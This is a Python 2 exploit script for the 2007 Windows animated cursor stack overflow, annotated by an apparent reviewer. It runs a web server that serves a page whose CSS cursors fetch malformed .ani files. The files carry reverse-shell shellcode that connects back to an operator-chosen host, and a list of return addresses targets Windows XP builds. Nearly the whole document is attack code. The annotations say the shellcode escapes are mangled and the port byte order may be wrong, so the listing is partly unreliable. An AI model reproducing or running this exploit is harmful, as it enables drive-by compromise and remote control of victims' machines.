
mswin-anim.txt

Posted on 11 June 2007

#!/usr/bin/env python
#
# $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $
#
# Windows Animated Cursor Stack Overflow Exploit
# Copyright 2007 Ramon de Carvalho Valle <ramon@risesecurity.org>,
# RISE Security <contact@risesecurity.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# Windows Animated Cursor Stack Overflow Vulnerability
# http://www.determina.com/security.research/vulnerabilities/ani-header.html
#
# How this script works (reviewer summary, derived from the code below):
#   * It runs a small HTTP server. A GET for "/" returns an HTML page that
#     declares one CSS "cursor: url(...)" per entry in `target`.
#   * Every other path returns a freshly generated RIFF/ACON (.ani) file whose
#     SECOND 'anih' chunk declares a size larger than the 36-byte header and
#     carries a return-address value followed by the reverse-shell payload.
#   * `tidx` rotates through `target` once per served file, so the browser's
#     len(target) cursor fetches each try a different address.
#
# NOTE(review): this is Python 2 code (print statements, BaseHTTPServer,
# string.atoi); it does not run under Python 3 as written.
# NOTE(review): the payload literals below appear to have lost their "\x"
# escapes in this copy ('xfcx6a...' rather than '\xfc\x6a...'), so as shown
# they are 45-character ASCII strings, not 15 raw bytes each, and the byte
# offsets patched in __main__ (160..163 and 166..167) do not correspond to
# this text. Treat the listing as a record of the technique, not as runnable.
# NOTE(review): the flaw is the one fixed by Microsoft in April 2007 — widely
# tracked as MS07-017 / CVE-2007-0038; confirm against the Determina advisory
# linked above.
#
# Wildcard imports: the names used below come from these modules — randint
# (random); digits/ascii_*/hexdigits/octdigits/atoi (string); pack (struct);
# inet_aton/gethostbyname (socket); argv/exit (sys); basename (os.path);
# BaseHTTPRequestHandler/HTTPServer (BaseHTTPServer).
from BaseHTTPServer import *
from os.path import *
from random import *
from socket import *
from string import *
from struct import *
from sys import *

#
# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1
#
# Reverse-shell payload. The LHOST/LPORT baked in here (127.0.0.1:1234) are
# overwritten in __main__ by slicing `buf` at fixed byte offsets, so the
# payload layout and those offsets must agree exactly. The operator must
# have a listener on <host>:<port> before a victim loads the page.
buf = \
'xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b' + \
'x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01' + \
'xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07' + \
'xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f' + \
'x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b' + \
'x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c' + \
'x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff' + \
'xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0' + \
'x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08' + \
'x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53' + \
'x53x53x53x53x43x53x43x53xffxd0x68x7fx00x00x01x66' + \
'x68x04xd2x66x53x89xe1x95x68xecxf9xaax60x57xff' + \
'xd6x6ax10x51x55xffxd0x66x6ax64x66x68x63x6dx6a' + \
'x50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95' + \
'x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxabx68' + \
'x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51' + \
'x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xff' + \
'xd6x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04' + \
'xffxd6xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6' + \
'xffxd0'

# Target list
#
# Each entry is one return-address candidate:
#   addr   - value written into the second 'anih' chunk
#   len    - how many bytes of it are written (1, 2 or 4; see riff_ani_file)
#   offset - number of random filler bytes placed before it (80 everywhere)
# The 2-byte entries only overwrite the low half of the pointer already on
# the stack and keep its high half, which is presumably why they are marked
# "Multi Language" (the module base may move, the low 16 bits do not) — not
# verifiable from this file. Commented-out entries are alternatives the
# author left disabled; no active entry uses len == 1.
target = [
# call [ebx+4]
# Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language
{'addr': 0x25ba, 'len': 2, 'offset': 80},
# Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
{'addr': 0x25d0, 'len': 2, 'offset': 80},
# Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English
{'addr': 0x769fc81a, 'len': 4, 'offset': 80},
# Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English
# {'addr': 0x77d825d0, 'len': 4, 'offset': 80},
# Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil)
{'addr': 0x769dc81a, 'len': 4, 'offset': 80},
# Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil)
# {'addr': 0x77d625d0, 'len': 4, 'offset': 80},
# call [esi+4]
# Microsoft Windows XP SP1a userenv.dll English
{'addr': 0x75a758b1, 'len': 4, 'offset': 80},
# Microsoft Windows XP SP1a shell32.dll English
# {'addr': 0x77441a66, 'len': 4, 'offset': 80},
# Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil)
{'addr': 0x75a4579b, 'len': 4, 'offset': 80},
# Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil)
# {'addr': 0x77427214, 'len': 4, 'offset': 80},
]

# Target list index
#
# Module-level cursor into `target`; riff_ani_file() advances it (wrapping)
# after every file it builds, so consecutive requests use consecutive targets.
tidx = 0

def randstr(count = 1, charset = 'ascii_alpha'):
    """Return `count` characters drawn uniformly at random from `charset`.

    `charset` is one of the names below ('ascii_alpha' = digits + upper +
    lower case). An unrecognised name is used literally as the alphabet to
    draw from. Uses random.randint, so the output is not cryptographically
    random — fine here, it only produces filler.
    """
    # Set the charset
    if charset == 'ascii_alpha':
        charset = digits + ascii_uppercase + ascii_lowercase
    elif charset == 'ascii_letters':
        charset = ascii_letters
    elif charset == 'ascii_lowercase':
        charset = ascii_lowercase
    elif charset == 'ascii_uppercase':
        charset = ascii_uppercase
    elif charset == 'digits':
        charset = digits
    elif charset == 'hexdigits':
        charset = hexdigits
    elif charset == 'octdigits':
        charset = octdigits
    # Create the string
    i = 0
    str = ''  # NOTE(review): shadows the builtin `str` inside this function
    while i < count:
        str = str + charset[randint(0, len(charset)-1)]
        i = i + 1
    return str

def riff_chunk():
    """Build one junk RIFF chunk: 4-char random id, LE uint32 size, random data.

    The data length is always even (2..512 bytes), keeping the chunk
    word-aligned as the RIFF layout expects. These chunks carry no meaning
    for the exploit; they vary the file layout between downloads
    (presumably to defeat simple signatures — intent not stated in the file).
    """
    chunk_id = randstr(4)
    chunk_data = randstr(randint(1, 256)*2)
    chunk_size = pack('<L', len(chunk_data))
    return chunk_id + chunk_size + chunk_data

def riff_ani_file():
    """Build one malicious RIFF/ACON animated-cursor file for target[tidx].

    Layout produced:
        'RIFF' <size> 'ACON'
            1..256 random chunks
            'anih' 36 <well-formed 36-byte header>     (anih_a)
            1..256 random chunks
            'anih' <82|84> <offset filler><addr>        (anih_b)
            <buf>                                       (payload bytes)

    The second 'anih' chunk declares a size larger than the 36-byte header;
    per the linked advisory that size is trusted by the loader, and the
    target address placed `offset` bytes in is what ends up used as a
    return address. Advances the global `tidx` (wrapping) as a side effect.

    Defender's check: a legitimate 'anih' chunk is 36 bytes; any other size
    — here 82 or 84 — is the tell-tale of this file.
    """
    global buf, target, tidx
    # Create the first header subchunk
    # 9 little-endian DWORDs (36 bytes) with the first DWORD = 36, i.e. a
    # header that declares its own correct size; the two random values fall
    # in the second and third fields. This one is meant to parse cleanly so
    # the loader goes on to the second header.
    anih_a = [36, randint(1, 65535), randint(1, 65535), 0, 0, 0, 0, 0, 1]
    anih_a = pack('<%dL' % len(anih_a), *[i for i in anih_a])  # the comprehension is a plain copy
    anih_a = 'anih' + pack('<L', len(anih_a)) + anih_a
    # Create the second header subchunk
    anih_b = randstr(target[tidx]['offset'])
    # Set the current indexed target
    # 1/2/4-byte write of the address; 2 bytes = partial pointer overwrite.
    if target[tidx]['len'] == 1:
        anih_b = anih_b + pack('<B', target[tidx]['addr'])
    elif target[tidx]['len'] == 2:
        anih_b = anih_b + pack('<H', target[tidx]['addr'])
    else:
        anih_b = anih_b + pack('<L', target[tidx]['addr'])
    # Declared size is len(filler) + len(addr), deliberately not 36.
    anih_b = 'anih' + pack('<L', len(anih_b)) + anih_b
    # Format ID
    riff = 'ACON'
    # Random subchunks
    for i in range(randint(1, 256)):
        riff = riff + riff_chunk()
    # First header subchunk
    riff = riff + anih_a
    # Random subchunks
    for i in range(randint(1, 256)):
        riff = riff + riff_chunk()
    # Second header subchunk
    riff = riff + anih_b
    # Shellcode
    # Appended raw after the overflowing chunk, not wrapped in a chunk header.
    riff = riff + buf
    # File ID and length of file
    # RIFF size field covers everything after itself ('ACON' + chunks + buf).
    riff = 'RIFF' + pack('<L', len(riff)) + riff
    # Update the target list index
    if tidx < len(target)-1:
        tidx = tidx + 1
    else:
        tidx = 0
    return riff

def randhtml():
    """Return the landing page: random text plus one cursor-bearing <div> per target.

    Each <div> sets "cursor: url(/<random>.<ext>)", so a browser rendering
    the page issues len(target) requests for cursor files, and the handler
    answers each with riff_ani_file() (which rotates `tidx`). The extension
    is picked from several RIFF-based types, not just .ani — the handler
    serves the same RIFF regardless of path, so this relies on the cursor
    loader accepting the content irrespective of extension (not verifiable
    from this file). Text filler is randomised to vary the page.
    """
    global buf, target, tidx
    # Random RIFF file extensions
    extension = ['ani', 'avi', 'cdr', 'rmi', 'wav']
    # Random html document
    html = \
    '<html> <head> <title>' + \
    randstr(randint(1, 256)) + \
    '</title> </head> <body> '
    for i in range(randint(0, 4)):
        html = html + randstr(randint(1, 256)) + ' '
    for i in range(len(target)):
        html = html + \
        '<div id="' + randstr(randint(4, 16)) + '" ' \
        'style="cursor: url(/' + randstr(randint(4, 16)) + '.' + \
        extension[randint(0, len(extension)-1)] + ')"> '
        # Inner loop reuses the name `i`; harmless, the outer range is fixed.
        for i in range(randint(0, 4)):
            html = html + randstr(randint(1, 256)) + ' '
        html = html + '</div> '
    for i in range(randint(0, 4)):
        html = html + randstr(randint(1, 256)) + ' '
    html = html + '</body> </html> '
    return html

class RequestHandler(BaseHTTPRequestHandler):
    """HTTP handler: "/" gets the HTML page, any other path gets a fresh .ani."""

    def do_GET(self):
        # Every request is answered 200, whatever the path.
        self.send_response(200)
        if self.path == '/':
            # Send the html document
            html = randhtml()
            self.send_header('Content-Type', 'text/html; charset=UTF-8')
            self.send_header('Content-Length', str(len(html)))
            self.end_headers()
            self.wfile.write(html)
            return
        # Generate and send the RIFF file
        # No path check: any non-root URL, including the random cursor
        # names emitted by randhtml(), yields a new file and advances tidx.
        riff = riff_ani_file()
        # NOTE(review): 'application/octetstream' is not the registered type
        # ('application/octet-stream'); left as written.
        self.send_header('Content-Type', 'application/octetstream')
        self.send_header('Content-Length', str(len(riff)))
        self.end_headers()
        self.wfile.write(riff)

def usage():
    """Print the command-line synopsis: listen host/port, then callback host/port."""
    print 'Usage: ./%s <http_host> <http_port> <host> <port>' \
        % basename(argv[0])

if __name__ == '__main__':
    print 'Windows Animated Cursor Stack Overflow Exploit'
    print 'Copyright 2007 RISE Security <contact@risesecurity.org> '
    args = argv[1:]
    if '-h' in args or '--help' in args:
        usage()
        exit()
    # Defaults: serve on all interfaces :8080, payload calls back to
    # 127.0.0.1:1234 (the values the payload was generated with).
    http_host = '0.0.0.0'
    http_port = 8080
    host = '127.0.0.1'
    port = 1234
    # NOTE(review): the bare except means a short or malformed argument list
    # is silently accepted — e.g. three arguments leave `port` at 1234, and a
    # non-numeric port keeps the default with no message.
    try:
        http_host = argv[1]
        http_port = atoi(argv[2])
        host = argv[3]
        port = atoi(argv[4])
    except:
        pass
    # Set shellcode host and port to connect to
    # inet_aton() yields the 4 address bytes in network order, which is the
    # form the payload's 'push 0x0100007f' immediate (7f 00 00 01) expects.
    buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:]
    # NOTE(review): pack('<H') writes the port little-endian, but the payload
    # immediate for LPORT=1234 reads 04 d2 — network (big-endian) order.
    # For any port other than the baked-in one this likely writes the bytes
    # swapped; verify the byte order ('>H') before trusting a custom <port>.
    buf = buf[:166] + pack('<H', port) + buf[168:]
    # Start the HTTP server
    server_class = HTTPServer
    httpd = server_class((http_host, http_port), RequestHandler)
    print 'Listening on %s:%s' % (http_host, http_port)
    # Runs until interrupted; the bare except also hides bind/serve errors.
    try:
        httpd.serve_forever()
    except:
        pass

 
